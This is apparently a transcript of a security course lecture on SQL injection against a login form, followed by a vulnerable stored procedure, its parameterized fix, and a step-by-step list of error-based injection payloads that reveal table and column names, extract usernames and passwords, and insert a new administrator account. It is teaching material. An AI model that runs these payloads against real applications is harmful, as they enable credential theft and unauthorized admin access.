1 00:00:01,240 --> 00:00:10,110 Let's now study a case application. A database server is behind this application. To log on, a user name 2 00:00:10,220 --> 00:00:17,260 (for example admin) and a password are needed. If you submit invalid data, 3 00:00:17,400 --> 00:00:21,060 the application will not log you in. 4 00:00:21,130 --> 00:00:24,060 We don't even know a valid user name for this application. 5 00:00:25,590 --> 00:00:26,820 We can enter 6 00:00:26,910 --> 00:00:28,050 qwe 7 00:00:28,080 --> 00:00:29,960 d as the login as well. 8 00:00:32,470 --> 00:00:35,100 The result would be the same. 9 00:00:35,240 --> 00:00:42,010 There's little chance that this user name is found in the system. We'll now modify the command exactly as 10 00:00:42,010 --> 00:00:44,320 we showed you before: 11 00:00:47,090 --> 00:00:52,790 we need to end this string with an apostrophe, insert a condition that is always true, and mark the following 12 00:00:52,790 --> 00:00:54,300 part of the string as a comment. 13 00:00:57,420 --> 00:00:58,840 This trick works. 14 00:01:00,540 --> 00:01:07,340 You can even see that the user name we're logged in under is quite unusual. Because it is so simple and doesn't 15 00:01:07,340 --> 00:01:13,220 require modification of source code, SQL injection is now one of the biggest persistent perils 16 00:01:13,250 --> 00:01:15,280 in the Internet and local networks. 17 00:01:20,480 --> 00:01:25,490 Let's come back to the case code. As we mentioned before, 18 00:01:25,550 --> 00:01:30,260 string concatenation may be done client side or server side without much difference. 19 00:01:32,410 --> 00:01:34,340 Let's see if this statement is accurate. 20 00:01:36,070 --> 00:01:40,840 We'll create a procedure with the user name as a parameter in the call and the user's password as the 21 00:01:40,840 --> 00:01:45,360 second parameter; their values are empty by default.
22 00:01:47,810 --> 00:01:54,720 For whatever reason the developer has created the procedure in this way. Next we'll declare a variable 23 00:01:54,720 --> 00:01:58,880 in the procedure body in which we'll construct an executable statement. 24 00:02:01,190 --> 00:02:08,910 Constructing the statement, we'll enter exactly the same values as before: we want to check whether a correct 25 00:02:08,930 --> 00:02:16,430 user name parameter has been submitted and whether the password is also correct. At the end we want to make 26 00:02:16,430 --> 00:02:22,800 the string executable; the EXEC statement is used for this purpose. 27 00:02:22,810 --> 00:02:26,670 Let's create this procedure. 28 00:02:26,710 --> 00:02:32,860 Now let's try to execute it again by maliciously submitting ' OR 1=1 -- instead of the 29 00:02:32,860 --> 00:02:34,380 username and password. 30 00:02:35,550 --> 00:02:40,700 The difference here is that we need to submit a different, but always an even, number of apostrophes. 31 00:02:42,110 --> 00:02:47,040 The single quotes are always inside the procedure body and in the call. 32 00:02:47,070 --> 00:02:50,670 This has to be taken into account. 33 00:02:50,690 --> 00:02:54,450 Let's check the call for the procedure. 34 00:02:54,480 --> 00:02:55,760 Nothing has changed. 35 00:02:57,010 --> 00:03:03,880 Again, as a user we can control program execution or the results it returns by submitting simple logical 36 00:03:03,880 --> 00:03:04,980 expressions. 37 00:03:06,380 --> 00:03:12,780 This attack can and should be avoided by, for example, not joining the statement definition with parameters. 38 00:03:15,830 --> 00:03:22,340 In the case of the MS SQL database server a solution is provided by the use of the sp_executesql procedure. 39 00:03:22,370 --> 00:03:29,240 Instead of calling a string, with this procedure we have a statement that we want to 40 00:03:29,240 --> 00:03:38,730 execute, a definition of parameters, and a first and second parameter.
41 00:03:38,830 --> 00:03:41,030 Nothing can be concatenated. 42 00:03:41,180 --> 00:03:44,340 Let's try to alter our procedure. 43 00:03:44,500 --> 00:03:47,030 Let's execute it again in the same way. 44 00:03:47,830 --> 00:03:50,180 The operation failed this time. 45 00:03:50,200 --> 00:03:54,120 Now the procedure must be called with two parameters of the expected type. 46 00:03:55,130 --> 00:03:58,010 If they are not supplied, the procedure fails. 47 00:03:59,510 --> 00:04:02,600 If the OR 1=1 expression is the parameter, 48 00:04:02,600 --> 00:04:04,500 there would be no problem. 49 00:04:04,700 --> 00:04:12,840 It's a parameter value; the SQL server knows this and doesn't link it in any way to the executed statement. 50 00:04:14,970 --> 00:04:21,000 Simple SQL injection can allow an attacker to log on to a database server application without submitting 51 00:04:21,000 --> 00:04:22,290 a login and the password: 52 00:04:25,060 --> 00:04:30,540 you can enter an expression in this place that is always true and add a specified number of single quotes 53 00:04:30,540 --> 00:04:32,460 and double dashes at the end. 54 00:04:32,700 --> 00:04:34,860 As simple as that. 55 00:04:35,020 --> 00:04:38,840 But this attack technique offers a far wider range of possibilities. 56 00:04:40,350 --> 00:04:45,240 We'll now be executing statements directly on the side of the database server to see the results of the 57 00:04:45,240 --> 00:04:48,950 attack in real time and give the attack a little speed boost. 58 00:04:50,550 --> 00:04:54,880 We have no control over the code in rows 40 and 42. 59 00:04:54,950 --> 00:05:00,660 It could, for example, be embedded in application code.
60 00:05:00,830 --> 00:05:03,740 It's a query that we've already performed two times before. 61 00:05:07,370 --> 00:05:15,680 The row we do have control over is row 41. To improve readability, double dashes are inserted at the beginning 62 00:05:15,680 --> 00:05:20,770 of row 42 and not at the end of row 41. 63 00:05:20,830 --> 00:05:26,120 Unfortunately, in this interface the end-of-line marker affects the two dashes. 64 00:05:28,410 --> 00:05:30,280 We can enter only row 41, 65 00:05:30,300 --> 00:05:35,790 assuming that rows 40 and 42 are already entered. 66 00:05:35,960 --> 00:05:37,640 What does this mean for us? 67 00:05:38,350 --> 00:05:45,410 Firstly, we can of course read the contents of the table. If the application's check of the query 68 00:05:45,410 --> 00:05:47,700 assumes that if the statement returns more than 0 rows, 69 00:05:47,930 --> 00:05:55,770 this means the correct login and password were supplied, we're logged in, as we've seen. 70 00:05:55,770 --> 00:06:03,860 Being more inquisitive, we can also try to see if we can obtain some information about the 71 00:06:03,860 --> 00:06:06,230 structure of the database we're connected to. 72 00:06:08,060 --> 00:06:13,100 With this we move to a subject that we'll systematize later in theory. 73 00:06:13,190 --> 00:06:20,730 This is the so-called blind SQL injection. In this variant of the attack the names of columns and 74 00:06:20,730 --> 00:06:22,810 tables are unknown. 75 00:06:22,890 --> 00:06:25,680 They can, however, be sorted by some criteria. 76 00:06:27,770 --> 00:06:37,200 We can, for example, order by column 4. Or, as it turns out, we can't. 77 00:06:37,300 --> 00:06:42,490 If an application allows SQL injection and also returns to users the error messages reported 78 00:06:42,490 --> 00:06:47,670 by the database server, if one error is made, another can be made.
79 00:06:47,680 --> 00:06:53,320 This means that we're able to see that the table (its name is still unknown) does not have four columns. 80 00:06:54,620 --> 00:06:55,940 Does it have three columns? 81 00:06:55,940 --> 00:07:05,450 Then, since the application reports no error, we can assume it does. This information can obviously 82 00:07:05,450 --> 00:07:07,440 be obtained in a number of other ways. 83 00:07:08,830 --> 00:07:15,710 Another solution would be, for example, to add a UNION SELECT 1 clause: we'll add 1 to the result of 84 00:07:15,710 --> 00:07:21,840 the query. Query results must be tables in SQL as well. 85 00:07:21,950 --> 00:07:23,930 They have to be in a tabular format. 86 00:07:25,210 --> 00:07:32,200 There is an equal number of columns in all places in the table; rows cannot be shorter or longer. 87 00:07:33,780 --> 00:07:37,950 By looking at the error message you can see that one is not the correct column number. 88 00:07:44,590 --> 00:07:46,400 Two is not a good number either. 89 00:07:47,810 --> 00:07:54,480 We know already that there are three columns in the table; the application will return no error message 90 00:07:54,480 --> 00:07:55,970 in this case. 91 00:07:56,130 --> 00:07:59,420 It's high time to find the names of the three mysterious columns. 92 00:08:00,540 --> 00:08:07,760 Knowing them will constitute a point of entry to the entire database system. 93 00:08:07,770 --> 00:08:14,500 Let's try to enter the HAVING 1=1 expression. This logical test is applied to groups and not 94 00:08:14,500 --> 00:08:22,300 to rows; grouping comes before selecting something out of a group. 95 00:08:22,340 --> 00:08:24,770 Let's see how the server will react to this query.
96 00:08:26,060 --> 00:08:31,820 Since we wanted to check something that should be grouped, the server tells us that the user name column 97 00:08:31,820 --> 00:08:38,150 of the user table is not contained in the list of grouping columns and is not a parameter of an aggregate 98 00:08:38,150 --> 00:08:42,670 function such as SUM. Either way, this doesn't matter, though. 99 00:08:44,050 --> 00:08:50,190 What's vital for us is that we know the names of the table and its column. 100 00:08:50,210 --> 00:08:51,700 What else can be obtained? 101 00:08:52,700 --> 00:08:55,590 We know that there are three columns. 102 00:08:55,620 --> 00:09:01,460 The next step is to obtain the name of another column; we'll use the available information, 103 00:09:01,460 --> 00:09:10,030 the error messages, to alter the query. We admit that we forgot to use the column for grouping. 104 00:09:10,070 --> 00:09:13,130 Let's see what happens after executing the following query. 105 00:09:14,450 --> 00:09:19,330 The server tells us that we forgot to include another column. 106 00:09:19,370 --> 00:09:23,750 Next we execute a query that uses the information we've just received. 107 00:09:24,050 --> 00:09:28,370 The server's response is that there is another column that has not been included in the grouping. 108 00:09:29,530 --> 00:09:31,700 Using this information in another query, 109 00:09:31,870 --> 00:09:34,330 no further error messages will be prompted. 110 00:09:36,520 --> 00:09:42,090 At this point the name of the table and the names of all the table columns are found. 111 00:09:42,140 --> 00:09:48,300 We've not even connected to the database; this information can be discovered simply by reading error 112 00:09:48,300 --> 00:09:51,770 messages. 113 00:09:51,790 --> 00:09:58,010 Now, if we can obtain the column data types, this would be quite enough. 114 00:09:58,090 --> 00:10:01,490 Let's give it a try.
115 00:10:01,530 --> 00:10:08,920 We already know the UNION clause; the purpose of this operator is to combine the results of queries. 116 00:10:09,140 --> 00:10:13,260 This time we'll try to sum something that is contained in the username column. 117 00:10:13,280 --> 00:10:18,220 What will this produce? The username column cannot be summed up 118 00:10:18,340 --> 00:10:22,300 because the data type of the column is varchar. 119 00:10:22,320 --> 00:10:25,520 This is precisely the information we wanted to extract. 120 00:10:26,500 --> 00:10:29,650 The password column is likely to be the same, so we'll skip it. 121 00:10:30,610 --> 00:10:34,010 We'll check the result of summing for the third column. 122 00:10:34,060 --> 00:10:39,630 The result here is the bit data type. We have now acquired the name of the table, 123 00:10:39,830 --> 00:10:44,200 the names of the columns and the column data types. 124 00:10:44,290 --> 00:10:47,270 It would also be good to see the contents of the given table. 125 00:10:48,260 --> 00:10:50,210 How can we do this? 126 00:10:50,270 --> 00:10:57,590 We know that there are three columns; the data type of the third is bit, but it is a quite peculiar data 127 00:10:57,590 --> 00:11:02,210 type that stores a very limited range of values. 128 00:11:02,220 --> 00:11:06,630 It only takes a value of 0, 1 or NULL. 129 00:11:06,820 --> 00:11:14,230 The MIN(username) operation as the third column, the admin column of the bit data type, should fail due to 130 00:11:14,250 --> 00:11:21,980 type compatibility: individual rows of a table should have the same number of columns, and columns should 131 00:11:21,980 --> 00:11:25,840 be of the same type in all places. 132 00:11:25,850 --> 00:11:33,860 Let's see what the server will return: converting the value 'march' into the bit data type failed. 133 00:11:33,970 --> 00:11:40,000 In this way the name of the first user is discovered. You can use the same method to discover the password 134 00:11:40,000 --> 00:11:42,060 of the user.
135 00:11:42,130 --> 00:11:45,040 The password is "password". 136 00:11:45,100 --> 00:11:48,330 How can you discover the logins and passwords of other users? 137 00:11:49,630 --> 00:11:54,970 You already know the credentials of one user. We'll use the same trick, but this time we don't want to 138 00:11:54,970 --> 00:12:04,780 find the data we have already acquired. The next user is Tomic; as you can probably imagine, obtaining 139 00:12:04,780 --> 00:12:07,840 the password for this user is a mere technicality. 140 00:12:09,200 --> 00:12:13,870 We'll take Marchand's password, which was provided in an error message, and request the next password. 141 00:12:15,950 --> 00:12:19,000 The second password is more secure. 142 00:12:19,070 --> 00:12:22,710 We now know all we need to know. 143 00:12:22,750 --> 00:12:28,300 Perhaps, if you wanted to use the company's services again, you might like to save time by not writing 144 00:12:28,330 --> 00:12:33,650 OR 1=1 and similar expressions over and over. 145 00:12:33,700 --> 00:12:40,910 You can add yourself to the user list; since we can execute queries, we probably can execute INSERT 146 00:12:40,910 --> 00:12:42,090 commands as well. 147 00:12:44,050 --> 00:12:48,870 We know the name of the table and the names of the columns in the table. 148 00:12:48,880 --> 00:12:52,370 Now we can insert anything we want there. 149 00:12:52,410 --> 00:12:53,840 Something has happened. 150 00:12:54,060 --> 00:12:57,630 We don't know the details, since we're connected through a web interface. 151 00:12:59,120 --> 00:13:03,920 We don't see results as clearly as in this presentation, but we can always check if there is a new row, 152 00:13:06,170 --> 00:13:08,430 coming back to one of the earlier queries. 153 00:13:08,510 --> 00:13:15,320 It turns out that there's a new row: we can log in as attacker using the password tour.
154 00:13:15,420 --> 00:13:20,860 We're so fortunate that it seems we've become an administrator of the system. This technique could 155 00:13:20,860 --> 00:13:23,670 also be applied to other ranges of practices. 156 00:13:24,730 --> 00:13:29,580 This will be the introduction to the automated SQL injection attacks that will be covered soon.
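The two procedures the lecture builds, written out as an added example for Microsoft SQL Server (this is not the lecture's own code). The table dbo.users with the columns username, password and isadmin, the sample rows, and the plaintext password storage the demo implies are all assumptions made here so that the block runs on its own.

```sql
-- Constructed demo table (names and rows are assumptions, not from the lecture).
CREATE TABLE dbo.users (
    username VARCHAR(50) NOT NULL,
    password VARCHAR(50) NOT NULL,   -- plaintext only to mirror the demo
    isadmin  BIT         NOT NULL
);
INSERT INTO dbo.users (username, password, isadmin)
VALUES ('march', 'password', 1), ('tomic', 'Zx7!qpL2', 0);
GO

-- VULNERABLE: the statement is glued together from the parameters and then
-- handed to EXEC, so whatever the caller puts in @user becomes SQL.
CREATE PROCEDURE dbo.login_unsafe
    @user VARCHAR(50) = '',
    @pass VARCHAR(50) = ''
AS
BEGIN
    DECLARE @sql NVARCHAR(MAX);
    SET @sql = N'SELECT username, isadmin FROM dbo.users WHERE username = '''
             + @user + N''' AND password = ''' + @pass + N'''';
    EXEC (@sql);
END;
GO

-- The payload. In the T-SQL call every literal quote is doubled, which is why
-- the number of apostrophes submitted is always even. The parameter value is
--   ' OR 1=1 --
-- and the string that EXEC runs becomes
--   SELECT username, isadmin FROM dbo.users WHERE username = '' OR 1=1 --' AND password = ''
-- which returns every row, so the "login" succeeds with no valid credentials.
EXEC dbo.login_unsafe @user = ''' OR 1=1 --', @pass = '';
GO

-- HARDENED: the statement text is fixed; the values travel as typed
-- parameters through sp_executesql and are never spliced into the SQL.
CREATE PROCEDURE dbo.login_safe
    @user VARCHAR(50) = '',
    @pass VARCHAR(50) = ''
AS
BEGIN
    DECLARE @sql NVARCHAR(MAX) =
        N'SELECT username, isadmin FROM dbo.users WHERE username = @u AND password = @p';
    EXEC sp_executesql @sql,
                       N'@u VARCHAR(50), @p VARCHAR(50)',
                       @u = @user, @p = @pass;
END;
GO

-- Same payload against the hardened procedure: the server compares the
-- username column with the literal text ' OR 1=1 -- and finds no row.
EXEC dbo.login_safe @user = ''' OR 1=1 --', @pass = '';
GO
```

Run the script top to bottom in SQL Server Management Studio or sqlcmd. The first EXEC returns both rows; the second returns an empty result set, because sp_executesql passes @u and @p as values and the query text never changes.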
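The error-based enumeration the lecture walks through (ORDER BY, UNION column counting, HAVING and GROUP BY for names, SUM for types, MIN through a bit column for data, and the final INSERT), collected as added example payloads that are not part of the transcript. Each line is what goes into the user-name field of the login form; the server-side query shape is assumed to be the one the lecture's rows 40 to 42 describe, and the names users, username, password and isadmin are assumptions standing in for whatever the real error messages reveal. One deliberate change from the lecture: the column-count probes use NULL instead of 1, so that a text column cannot cause an unrelated conversion error before the column count is known.

```sql
-- Assumed application query (rows 40 and 42 of the lecture's editor):
--   SELECT * FROM users WHERE username = '<input>' AND password = '<input>'
-- Errors are shown to the user, so every failed guess leaks one fact.
-- Each payload below replaces <input> in the user-name field.

-- 1. Column count via ORDER BY: position 4 fails, position 3 does not.
' ORDER BY 4 --
' ORDER BY 3 --

-- 2. Column count via UNION: SQL Server reports that all queries combined
--    with UNION must have an equal number of expressions until it matches.
' UNION SELECT NULL --
' UNION SELECT NULL, NULL --
' UNION SELECT NULL, NULL, NULL --

-- 3. Table and column names. HAVING without GROUP BY makes the server name
--    the first column that is neither grouped nor aggregated, together with
--    its table. Add each reported column to GROUP BY until the query is quiet.
' HAVING 1=1 --
' GROUP BY username HAVING 1=1 --
' GROUP BY username, password HAVING 1=1 --
' GROUP BY username, password, isadmin HAVING 1=1 --

-- 4. Data types. SUM rejects both varchar and bit operands, and the error
--    text names the operand type each time.
' UNION SELECT SUM(username), NULL, NULL FROM users --
' UNION SELECT SUM(isadmin), NULL, NULL FROM users --

-- 5. Data via conversion errors. Placing MIN(username) under the bit column
--    forces a varchar-to-bit conversion, and the failure message quotes the
--    value that could not be converted. Narrow the WHERE clause to walk on
--    to the next user and to the password of a known user.
' UNION SELECT NULL, NULL, MIN(username) FROM users --
' UNION SELECT NULL, NULL, MIN(password) FROM users WHERE username = 'march' --
' UNION SELECT NULL, NULL, MIN(username) FROM users WHERE username > 'march' --

-- 6. Persistence: a stacked INSERT, then log in normally with the new row.
'; INSERT INTO users (username, password, isadmin) VALUES ('attacker', 'tour', 1) --
```

Step 3 depends on the server echoing its messages to the browser; with generic error pages the same probes still work, but only as true/false signals, which is the blind variant the lecture says it will systematize later.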